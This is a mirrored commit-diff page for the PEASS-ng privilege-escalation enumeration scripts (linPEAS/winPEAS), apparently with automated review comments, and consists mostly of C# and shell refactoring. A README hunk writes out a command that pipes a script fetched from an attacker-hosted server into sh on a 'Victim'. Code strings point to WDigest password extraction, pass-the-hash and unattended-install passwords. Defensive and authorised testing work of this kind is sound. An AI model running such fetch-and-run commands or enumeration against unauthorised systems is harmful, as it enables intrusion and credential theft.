mirror of
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
synced 2025-12-10 18:59:02 +00:00
Compare commits
11 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
ded6f3045f | ||
|
|
d20638fa7b | ||
|
|
aa69a494b4 | ||
|
|
a4b226c16e | ||
|
|
3cc49b5b9a | ||
|
|
e5b9b67786 | ||
|
|
e29c9e88d5 | ||
|
|
8b6ce759d0 | ||
|
|
116d842158 | ||
|
|
46033a7af0 | ||
|
|
0ab4a65bab |
4
.github/workflows/CI-master_tests.yml
vendored
4
.github/workflows/CI-master_tests.yml
vendored
@@ -1,10 +1,6 @@
|
||||
name: CI-master_test
|
||||
|
||||
on:
|
||||
pull_request:
|
||||
branches:
|
||||
- master
|
||||
|
||||
schedule:
|
||||
- cron: "5 4 * * SUN"
|
||||
|
||||
|
||||
@@ -22,7 +22,7 @@ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas
|
||||
|
||||
```bash
|
||||
# Local network
|
||||
sudo python -m SimpleHTTPServer 80 #Host
|
||||
sudo python -m http.server 80 #Host
|
||||
curl 10.10.10.10/linpeas.sh | sh #Victim
|
||||
|
||||
# Without curl
|
||||
|
||||
@@ -25,7 +25,7 @@ echo ""
|
||||
print_2title "CVEs Check"
|
||||
|
||||
#-- SY) CVE-2021-4034
|
||||
if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1642035600" ]; then
|
||||
if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1641942000" ]; then
|
||||
echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW},"
|
||||
echo ""
|
||||
fi
|
||||
|
||||
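Review bot: The epoch literal in the pkexec test (`-lt "1641942000"` on what appears to be the new-side line) is undocumented, and the check rests on the binary's mtime alone, which packaging, backports and image builds do not set consistently, so it can miss a vulnerable pkexec or flag a patched one. A comment above the `if` would make the intent reviewable, for example `# 1641942000 = 2022-01-11 23:00:00 UTC; a pkexec modified before this is assumed to predate the CVE-2021-4034 fix (mtime heuristic only)`. The printed text could reflect that uncertainty, e.g. `Potentially vulnerable to CVE-2021-4034`, so that whoever triages the finding confirms it against the installed polkit package version. `$(which pkexec)` is also unquoted in both `stat` calls.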
@@ -105,7 +105,7 @@ fi
|
||||
echo ""
|
||||
|
||||
#-- UI) Doas
|
||||
if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then
|
||||
if [ "$(command -v doas 2>/dev/null)" ] || [ "$DEBUG" ]; then
|
||||
print_2title "Checking doas.conf"
|
||||
doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
|
||||
if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then
|
||||
|
||||
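Review bot: With the test apparently switched from `[ -f "/etc/doas.conf" ]` to `command -v doas`, a host that has a doas.conf but no doas on the current PATH is no longer inspected. Under `$DEBUG` with no doas present, `dirname ""` yields `.`, so the `cat` two lines below reads `./doas.conf` and `./../etc/doas.conf` relative to the working directory. Keeping both triggers covers the first case: `if [ -f "/etc/doas.conf" ] || [ "$(command -v doas 2>/dev/null)" ] || [ "$DEBUG" ]; then`. For the second, the derived paths should only be added when `command -v doas` returned something, and `$doas_dir_name` should be quoted. The body of this `if` continues past the end of the hunk.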
@@ -808,7 +808,7 @@ basic_net_info(){
|
||||
select_nc (){
|
||||
#Select the correct configuration of the netcat found
|
||||
NC_SCAN="$FOUND_NC -v -n -z -w 1"
|
||||
$($FOUND_NC 127.0.0.1 65321 > /dev/null 2>&1)
|
||||
$($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1)
|
||||
if [ $? -eq 2 ]
|
||||
then
|
||||
NC_SCAN="timeout 1 $FOUND_NC -v -n"
|
||||
|
||||
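Review bot: The probe on the `$($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1)` line runs inside a command substitution used as a statement, which only works because the redirection leaves the expansion empty and the shell then reports the substitution's exit status in `$?`. Calling it directly is clearer and cannot end up executing stray output as a command: `$NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1`. The `[ $? -eq 2 ]` test that follows depends on how the installed netcat build reports the flags in `NC_SCAN`, so a one-line comment stating what status 2 is expected to mean would help the next maintainer. select_nc continues beyond the hunk.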
@@ -1,5 +1,4 @@
|
||||
using System.Reflection;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
// General Information about an assembly is controlled through the following
|
||||
|
||||
@@ -27,8 +27,8 @@ namespace winPEAS.Checks
|
||||
{
|
||||
Beaprint.MainPrint("Current Active Window Application");
|
||||
string title = ApplicationInfoHelper.GetActiveWindowTitle();
|
||||
List<string> permsFile = PermissionsHelper.GetPermissionsFile(title, winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> permsFolder = PermissionsHelper.GetPermissionsFolder(title, winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> permsFile = PermissionsHelper.GetPermissionsFile(title, Checks.CurrentUserSiDs);
|
||||
List<string> permsFolder = PermissionsHelper.GetPermissionsFolder(title, Checks.CurrentUserSiDs);
|
||||
if (permsFile.Count > 0)
|
||||
{
|
||||
Beaprint.BadPrint(" " + title);
|
||||
@@ -188,8 +188,8 @@ namespace winPEAS.Checks
|
||||
|
||||
foreach (Dictionary<string, string> sapp in scheduled_apps)
|
||||
{
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(sapp["Action"], winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> dirRights = PermissionsHelper.GetPermissionsFolder(sapp["Action"], winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(sapp["Action"], Checks.CurrentUserSiDs);
|
||||
List<string> dirRights = PermissionsHelper.GetPermissionsFolder(sapp["Action"], Checks.CurrentUserSiDs);
|
||||
string formString = " ({0}) {1}: {2}";
|
||||
|
||||
if (fileRights.Count > 0)
|
||||
@@ -238,8 +238,8 @@ namespace winPEAS.Checks
|
||||
foreach (var driver in DeviceDrivers.GetDeviceDriversNoMicrosoft())
|
||||
{
|
||||
string pathDriver = driver.Key;
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(pathDriver, winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> dirRights = PermissionsHelper.GetPermissionsFolder(pathDriver, winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(pathDriver, Checks.CurrentUserSiDs);
|
||||
List<string> dirRights = PermissionsHelper.GetPermissionsFolder(pathDriver, Checks.CurrentUserSiDs);
|
||||
|
||||
Dictionary<string, string> colorsD = new Dictionary<string, string>()
|
||||
{
|
||||
|
||||
@@ -363,8 +363,8 @@ namespace winPEAS.Checks
|
||||
try
|
||||
{
|
||||
Beaprint.GrayPrint(" - Creating disabled users list...");
|
||||
Checks.PaintDisabledUsers = string.Join("|", User.GetMachineUsers(false, true, false, false, false));
|
||||
PaintDisabledUsersNoAdministrator = Checks.PaintDisabledUsers.Replace("|Administrator", "").Replace("Administrator|", "").Replace("Administrator", "");
|
||||
PaintDisabledUsers = string.Join("|", User.GetMachineUsers(false, true, false, false, false));
|
||||
PaintDisabledUsersNoAdministrator = PaintDisabledUsers.Replace("|Administrator", "").Replace("Administrator|", "").Replace("Administrator", "");
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
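Review bot: The `Replace("Administrator", "")` chain on the `PaintDisabledUsersNoAdministrator` line works on substrings, so a disabled account whose name merely contains that text (a constructed example: `AdministratorBackup`) is rewritten into a different name in the resulting `|`-joined string. Filtering whole entries avoids that: `PaintDisabledUsersNoAdministrator = string.Join("|", PaintDisabledUsers.Split('|').Where(u => u != "Administrator"));` (this assumes `System.Linq` is imported in the file, which the hunk does not show). The `catch` that closes this `try` continues past the end of the hunk.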
@@ -411,7 +411,7 @@ namespace winPEAS.Checks
|
||||
try
|
||||
{
|
||||
if (RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "" && RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "")
|
||||
System.Console.WriteLine(@"ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
|
||||
Console.WriteLine(@"ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
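Review bot: The `if` at the top of the `try` compares the same call, `RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == ""`, on both sides of `&&`, so the second operand adds nothing except a second registry read. If a different hive or value name was intended it should be named there; otherwise reduce it to `if (RegistryHelper.GetRegValue("HKCU", "CONSOLE", "VirtualTerminalLevel") == "")`. The statement under the `if` also has no braces, unlike the neighbouring blocks visible on this page.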
@@ -425,7 +425,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
if (RegistryHelper.GetRegValue("HKLM", @"SYSTEM\CurrentControlSet\Control\FileSystem", "LongPathsEnabled") != "1")
|
||||
{
|
||||
System.Console.WriteLine(@"Long paths are disabled, so the maximum length of a path supported is 260chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
|
||||
Console.WriteLine(@"Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD");
|
||||
IsLongPath = false;
|
||||
}
|
||||
else
|
||||
|
||||
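Review bot: The message on the `Console.WriteLine` line tells the operator to run `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel`, but the condition above it reads `LongPathsEnabled`, so following the advice creates an unrelated value and leaves long paths disabled. The text should read `/v LongPathsEnabled /t REG_DWORD /d 1`. Since this is a machine-wide setting under HKLM rather than a per-user console preference, the message could say so, so that it is not changed casually on a host under assessment.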
@@ -118,7 +118,8 @@ namespace winPEAS.Checks
|
||||
|
||||
if (isFileFound)
|
||||
{
|
||||
if (!somethingFound) {
|
||||
if (!somethingFound)
|
||||
{
|
||||
Beaprint.MainPrint($"Found {searchName} Files");
|
||||
somethingFound = true;
|
||||
}
|
||||
@@ -352,7 +353,7 @@ namespace winPEAS.Checks
|
||||
|
||||
try
|
||||
{
|
||||
string text = System.IO.File.ReadAllText(f.FullPath);
|
||||
string text = File.ReadAllText(f.FullPath);
|
||||
|
||||
results = SearchContent(text, regex.regex, (bool)regex.caseinsensitive);
|
||||
if (results.Count > 0)
|
||||
@@ -460,8 +461,10 @@ namespace winPEAS.Checks
|
||||
|
||||
if (fileSettings.type == "f")
|
||||
{
|
||||
var colors = new Dictionary<string, string>();
|
||||
colors.Add(fileInfo.Filename, Beaprint.ansi_color_bad);
|
||||
var colors = new Dictionary<string, string>
|
||||
{
|
||||
{ fileInfo.Filename, Beaprint.ansi_color_bad }
|
||||
};
|
||||
Beaprint.AnsiPrint($"File: {fileInfo.FullPath}", colors);
|
||||
|
||||
if (!(bool)fileSettings.just_list_file)
|
||||
@@ -471,8 +474,10 @@ namespace winPEAS.Checks
|
||||
}
|
||||
else if (fileSettings.type == "d")
|
||||
{
|
||||
var colors = new Dictionary<string, string>();
|
||||
colors.Add(fileInfo.Filename, Beaprint.ansi_color_bad);
|
||||
var colors = new Dictionary<string, string>
|
||||
{
|
||||
{ fileInfo.Filename, Beaprint.ansi_color_bad }
|
||||
};
|
||||
Beaprint.AnsiPrint($"Folder: {fileInfo.FullPath}", colors);
|
||||
|
||||
// just list the directory
|
||||
|
||||
@@ -159,7 +159,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
string formString = " {0} ({1})\n Accessed:{2} -- Size:{3}";
|
||||
Beaprint.BadPrint(string.Format(formString, cc["file"], cc["Description"], cc["Accessed"], cc["Size"]));
|
||||
System.Console.WriteLine("");
|
||||
Console.WriteLine("");
|
||||
}
|
||||
}
|
||||
else
|
||||
@@ -182,7 +182,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
List<string> pwds = Unattended.ExtractUnattendedPwd(path);
|
||||
Beaprint.BadPrint(" " + path);
|
||||
System.Console.WriteLine(string.Join("\n", pwds));
|
||||
Console.WriteLine(string.Join("\n", pwds));
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
@@ -480,7 +480,7 @@ namespace winPEAS.Checks
|
||||
if (Regex.Match(rec_file["Name"], pattern.Replace("*", ".*"), RegexOptions.IgnoreCase).Success)
|
||||
{
|
||||
Beaprint.DictPrint(rec_file, colorF, true);
|
||||
System.Console.WriteLine();
|
||||
Console.WriteLine();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@@ -81,7 +81,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
if (line.Length > 0 && line[0] != '#')
|
||||
{
|
||||
System.Console.WriteLine(" " + line.Replace("\t", " "));
|
||||
Console.WriteLine(" " + line.Replace("\t", " "));
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -304,8 +304,8 @@ namespace winPEAS.Checks
|
||||
Beaprint.GrayPrint(" DENY rules:");
|
||||
foreach (Dictionary<string, string> rule in Firewall.GetFirewallRules())
|
||||
{
|
||||
string filePerms = string.Join(", ", PermissionsHelper.GetPermissionsFile(rule["AppName"], winPEAS.Checks.Checks.CurrentUserSiDs));
|
||||
string folderPerms = string.Join(", ", PermissionsHelper.GetPermissionsFolder(rule["AppName"], winPEAS.Checks.Checks.CurrentUserSiDs));
|
||||
string filePerms = string.Join(", ", PermissionsHelper.GetPermissionsFile(rule["AppName"], Checks.CurrentUserSiDs));
|
||||
string folderPerms = string.Join(", ", PermissionsHelper.GetPermissionsFolder(rule["AppName"], Checks.CurrentUserSiDs));
|
||||
string formString = " ({0}){1}[{2}]: {3} {4} {5} from {6} --> {7}";
|
||||
if (filePerms.Length > 0)
|
||||
formString += "\n File Permissions: {8}";
|
||||
|
||||
@@ -20,7 +20,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
CheckRunner.Run(() =>
|
||||
{
|
||||
modifiableServices = ServicesInfoHelper.GetModifiableServices(winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
modifiableServices = ServicesInfoHelper.GetModifiableServices(Checks.CurrentUserSiDs);
|
||||
}, isDebug);
|
||||
}
|
||||
catch (Exception ex)
|
||||
@@ -53,12 +53,12 @@ namespace winPEAS.Checks
|
||||
|
||||
foreach (Dictionary<string, string> serviceInfo in services_info)
|
||||
{
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(serviceInfo["FilteredPath"], winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> fileRights = PermissionsHelper.GetPermissionsFile(serviceInfo["FilteredPath"], Checks.CurrentUserSiDs);
|
||||
List<string> dirRights = new List<string>();
|
||||
|
||||
if (serviceInfo["FilteredPath"] != null && serviceInfo["FilteredPath"] != "")
|
||||
{
|
||||
dirRights = PermissionsHelper.GetPermissionsFolder(Path.GetDirectoryName(serviceInfo["FilteredPath"]), winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
dirRights = PermissionsHelper.GetPermissionsFolder(Path.GetDirectoryName(serviceInfo["FilteredPath"]), Checks.CurrentUserSiDs);
|
||||
}
|
||||
|
||||
bool noQuotesAndSpace = MyUtils.CheckQuoteAndSpace(serviceInfo["PathName"]);
|
||||
@@ -159,7 +159,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
Beaprint.MainPrint("Looking if you can modify any service registry");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services-registry-permissions", "Check if you can modify the registry of a service");
|
||||
List<Dictionary<string, string>> regPerms = ServicesInfoHelper.GetWriteServiceRegs(winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<Dictionary<string, string>> regPerms = ServicesInfoHelper.GetWriteServiceRegs(Checks.CurrentUserSiDs);
|
||||
|
||||
Dictionary<string, string> colorsWR = new Dictionary<string, string>()
|
||||
{
|
||||
|
||||
@@ -5,21 +5,21 @@ using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text.RegularExpressions;
|
||||
using winPEAS._3rdParty.Watson;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.AppLocker;
|
||||
using winPEAS._3rdParty.Watson;
|
||||
using winPEAS.Info.SystemInfo.Printers;
|
||||
using winPEAS.Info.SystemInfo.NamedPipes;
|
||||
using winPEAS.Info.SystemInfo;
|
||||
using winPEAS.Info.SystemInfo.SysMon;
|
||||
using winPEAS.Helpers.Extensions;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.Info.SystemInfo;
|
||||
using winPEAS.Info.SystemInfo.AuditPolicies;
|
||||
using winPEAS.Info.SystemInfo.DotNet;
|
||||
using winPEAS.Info.SystemInfo.GroupPolicy;
|
||||
using winPEAS.Info.SystemInfo.WindowsDefender;
|
||||
using winPEAS.Info.SystemInfo.PowerShell;
|
||||
using winPEAS.Info.SystemInfo.NamedPipes;
|
||||
using winPEAS.Info.SystemInfo.Ntlm;
|
||||
using winPEAS.Info.SystemInfo.PowerShell;
|
||||
using winPEAS.Info.SystemInfo.Printers;
|
||||
using winPEAS.Info.SystemInfo.SysMon;
|
||||
using winPEAS.Info.SystemInfo.WindowsDefender;
|
||||
using winPEAS.Native.Enums;
|
||||
|
||||
namespace winPEAS.Checks
|
||||
@@ -107,7 +107,7 @@ namespace winPEAS.Checks
|
||||
{ Globals.StrTrue, Beaprint.ansi_color_bad },
|
||||
};
|
||||
Beaprint.DictPrint(basicDictSystem, colorsSI, false);
|
||||
System.Console.WriteLine();
|
||||
Console.WriteLine();
|
||||
Watson.FindVulns();
|
||||
|
||||
//To update Watson, update the CVEs and add the new ones and update the main function so it uses new CVEs (becausfull with the Beaprints inside the FindVulns function)
|
||||
@@ -369,12 +369,12 @@ namespace winPEAS.Checks
|
||||
|
||||
if (lsaCfgFlags == "1")
|
||||
{
|
||||
System.Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
|
||||
Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
|
||||
Beaprint.GoodPrint(" CredentialGuard is active with UEFI lock");
|
||||
}
|
||||
else if (lsaCfgFlags == "2")
|
||||
{
|
||||
System.Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
|
||||
Console.WriteLine(" Please, note that this only checks the LsaCfgFlags key value. This is not enough to enable Credentials Guard (but it's a strong indicator).");
|
||||
Beaprint.GoodPrint(" CredentialGuard is active without UEFI lock");
|
||||
}
|
||||
else
|
||||
@@ -572,7 +572,7 @@ namespace winPEAS.Checks
|
||||
else if (using_HKLM_WSUS == "0")
|
||||
Beaprint.GoodPrint(" But UseWUServer is equals to 0, so it is not vulnerable!");
|
||||
else
|
||||
System.Console.WriteLine(" But UseWUServer is equals to " + using_HKLM_WSUS + ", so it may work or not");
|
||||
Console.WriteLine(" But UseWUServer is equals to " + using_HKLM_WSUS + ", so it may work or not");
|
||||
}
|
||||
else
|
||||
{
|
||||
@@ -1070,7 +1070,7 @@ namespace winPEAS.Checks
|
||||
}
|
||||
else if (kvp.Value.GetType().IsArray && (kvp.Value.GetType().GetElementType().ToString() == "System.Byte"))
|
||||
{
|
||||
val = System.BitConverter.ToString((byte[])kvp.Value);
|
||||
val = BitConverter.ToString((byte[])kvp.Value);
|
||||
}
|
||||
else
|
||||
{
|
||||
@@ -1086,12 +1086,12 @@ namespace winPEAS.Checks
|
||||
Beaprint.BadPrint(" [!] WDigest is enabled - plaintext password extraction is possible!");
|
||||
}
|
||||
|
||||
if (key.Equals("RunAsPPL", System.StringComparison.InvariantCultureIgnoreCase) && val == "1")
|
||||
if (key.Equals("RunAsPPL", StringComparison.InvariantCultureIgnoreCase) && val == "1")
|
||||
{
|
||||
Beaprint.BadPrint(" [!] LSASS Protected Mode is enabled! You will not be able to access lsass.exe's memory easily.");
|
||||
}
|
||||
|
||||
if (key.Equals("DisableRestrictedAdmin", System.StringComparison.InvariantCultureIgnoreCase) && val == "0")
|
||||
if (key.Equals("DisableRestrictedAdmin", StringComparison.InvariantCultureIgnoreCase) && val == "0")
|
||||
{
|
||||
Beaprint.BadPrint(" [!] RDP Restricted Admin Mode is enabled! You can use pass-the-hash to access RDP on this system.");
|
||||
}
|
||||
|
||||
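Review bot: The `RunAsPPL` test accepts only `val == "1"`, while Microsoft also documents `2` (LSA protection enabled without a UEFI variable, on Windows 11 22H2 and later), so a host protected that way goes unreported by this check. Suggest `if (key.Equals("RunAsPPL", StringComparison.OrdinalIgnoreCase) && (val == "1" || val == "2"))`. Ordinal comparison is the appropriate choice for registry value names, and the same applies to the `DisableRestrictedAdmin` line below. The enclosing loop starts outside the hunk.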
@@ -1,8 +1,6 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Cryptography;
|
||||
using System.Security.Principal;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Extensions;
|
||||
@@ -158,7 +156,7 @@ namespace winPEAS.Checks
|
||||
try
|
||||
{
|
||||
Beaprint.MainPrint("RDP Sessions");
|
||||
List<Dictionary<string, string>> rdp_sessions = Info.UserInfo.UserInfoHelper.GetRDPSessions();
|
||||
List<Dictionary<string, string>> rdp_sessions = UserInfoHelper.GetRDPSessions();
|
||||
if (rdp_sessions.Count > 0)
|
||||
{
|
||||
string format = " {0,-10}{1,-15}{2,-15}{3,-25}{4,-10}{5}";
|
||||
@@ -263,7 +261,7 @@ namespace winPEAS.Checks
|
||||
{
|
||||
Beaprint.MainPrint("Password Policies");
|
||||
Beaprint.LinkPrint("", "Check for a possible brute-force");
|
||||
List<Dictionary<string, string>> PPy = Info.UserInfo.UserInfoHelper.GetPasswordPolicy();
|
||||
List<Dictionary<string, string>> PPy = UserInfoHelper.GetPasswordPolicy();
|
||||
Beaprint.DictPrint(PPy, ColorsU(), false);
|
||||
}
|
||||
catch (Exception ex)
|
||||
|
||||
@@ -327,6 +327,8 @@ namespace winPEAS.Helpers.AppLocker
|
||||
if (depth == FolderCheckMaxDepth) return false;
|
||||
|
||||
try
|
||||
{
|
||||
if (Directory.Exists(path))
|
||||
{
|
||||
var subfolders = Directory.EnumerateDirectories(path);
|
||||
var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);
|
||||
@@ -363,6 +365,7 @@ namespace winPEAS.Helpers.AppLocker
|
||||
return true;
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
}
|
||||
|
||||
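Review bot: `Directory.Exists(path)` returns false not only for a missing directory but also when the caller cannot read it, and together with the empty `catch (Exception) { }` that closes this block an unreadable or failing path is silently treated the same as a clean one. For a permissions audit that difference matters, so the skipped path should at least appear in debug output, e.g. `catch (Exception ex) { Beaprint.GrayPrint("Error: " + ex); }`, the form already used in another hunk of this change set (assuming `Beaprint` is reachable from this file). The same guard-plus-swallow pattern appears in the `winPEAS.Helpers` hunks at `@@ -353,6 +353,8 @@` and `@@ -365,6 +367,7 @@` and in the `winPEAS.Info.ApplicationInfo` hunks from `@@ -343,6 +343,8 @@` to `@@ -382,6 +387,7 @@`. The `+`/`-` markers are lost on this page, so which of these lines the commit added is inferred from the hunk counts, and the method itself starts and ends outside the hunks.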
@@ -1,7 +1,6 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Threading;
|
||||
|
||||
namespace winPEAS.Helpers
|
||||
{
|
||||
|
||||
@@ -4,7 +4,6 @@ using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security;
|
||||
using System.Security.Permissions;
|
||||
using System.Text;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Enums;
|
||||
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
using System;
|
||||
using Microsoft.Win32.SafeHandles;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.ComponentModel;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using Microsoft.Win32.SafeHandles;
|
||||
using winPEAS.Native;
|
||||
|
||||
namespace winPEAS.Helpers.CredentialManager
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Enums;
|
||||
|
||||
|
||||
@@ -1,11 +1,9 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Diagnostics;
|
||||
using System.Linq;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Principal;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.Helpers
|
||||
{
|
||||
@@ -438,9 +436,11 @@ namespace winPEAS.Helpers
|
||||
// Get the owner of a process given the PID
|
||||
public static Dictionary<string, string> GetProcU(Process p)
|
||||
{
|
||||
Dictionary<string, string> data = new Dictionary<string, string>();
|
||||
data["name"] = "";
|
||||
data["sid"] = "";
|
||||
Dictionary<string, string> data = new Dictionary<string, string>
|
||||
{
|
||||
["name"] = "",
|
||||
["sid"] = ""
|
||||
};
|
||||
IntPtr pHandle = IntPtr.Zero;
|
||||
try
|
||||
{
|
||||
@@ -586,7 +586,7 @@ namespace winPEAS.Helpers
|
||||
{ // This shouldn't be needed
|
||||
if (path.StartsWith("\\"))
|
||||
path = path.Substring(1);
|
||||
hive = Helpers.Registry.RegistryHelper.CheckIfExists(path);
|
||||
hive = Registry.RegistryHelper.CheckIfExists(path);
|
||||
}
|
||||
|
||||
if (path.StartsWith("\\"))
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
using System;
|
||||
using System.Diagnostics;
|
||||
using System.Diagnostics;
|
||||
|
||||
namespace winPEAS.Helpers
|
||||
{
|
||||
|
||||
@@ -1,11 +1,11 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Security.AccessControl;
|
||||
using System.Security.Principal;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
|
||||
namespace winPEAS.Helpers
|
||||
{
|
||||
@@ -353,6 +353,8 @@ namespace winPEAS.Helpers
|
||||
{
|
||||
results[path] = String.Join(", ", GetPermissionsFolder(path, Checks.Checks.CurrentUserSiDs));
|
||||
if (string.IsNullOrEmpty(results[path]))
|
||||
{
|
||||
if (Directory.Exists(path))
|
||||
{
|
||||
foreach (string d in Directory.EnumerateDirectories(path))
|
||||
{
|
||||
@@ -365,6 +367,7 @@ namespace winPEAS.Helpers
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch
|
||||
{
|
||||
//Access denied to a path
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using Microsoft.Win32;
|
||||
|
||||
namespace winPEAS.Helpers.Registry
|
||||
{
|
||||
@@ -177,7 +177,7 @@ namespace winPEAS.Helpers.Registry
|
||||
|
||||
internal static uint? GetDwordValue(string hive, string key, string val)
|
||||
{
|
||||
string strValue = RegistryHelper.GetRegValue(hive, key, val);
|
||||
string strValue = GetRegValue(hive, key, val);
|
||||
|
||||
if (uint.TryParse(strValue, out uint res))
|
||||
{
|
||||
|
||||
@@ -221,43 +221,43 @@ namespace winPEAS.Helpers.Search
|
||||
{
|
||||
// c:\users
|
||||
string rootUsersSearchPath = $"{SystemDrive}\\Users\\";
|
||||
SearchHelper.RootDirUsers = SearchHelper.GetFilesFast(rootUsersSearchPath, GlobalPattern, isFoldersIncluded: true);
|
||||
RootDirUsers = GetFilesFast(rootUsersSearchPath, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\users\current_user
|
||||
string rootCurrentUserSearchPath = Environment.GetEnvironmentVariable("USERPROFILE");
|
||||
SearchHelper.RootDirCurrentUser = SearchHelper.GetFilesFast(rootCurrentUserSearchPath, GlobalPattern, isFoldersIncluded: true);
|
||||
RootDirCurrentUser = GetFilesFast(rootCurrentUserSearchPath, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\Program Files\
|
||||
string rootProgramFiles = $"{SystemDrive}\\Program Files\\";
|
||||
SearchHelper.ProgramFiles = SearchHelper.GetFilesFast(rootProgramFiles, GlobalPattern, isFoldersIncluded: true);
|
||||
ProgramFiles = GetFilesFast(rootProgramFiles, GlobalPattern, isFoldersIncluded: true);
|
||||
|
||||
// c:\Program Files (x86)\
|
||||
string rootProgramFilesX86 = $"{SystemDrive}\\Program Files (x86)\\";
|
||||
SearchHelper.ProgramFilesX86 = SearchHelper.GetFilesFast(rootProgramFilesX86, GlobalPattern, isFoldersIncluded: true);
|
||||
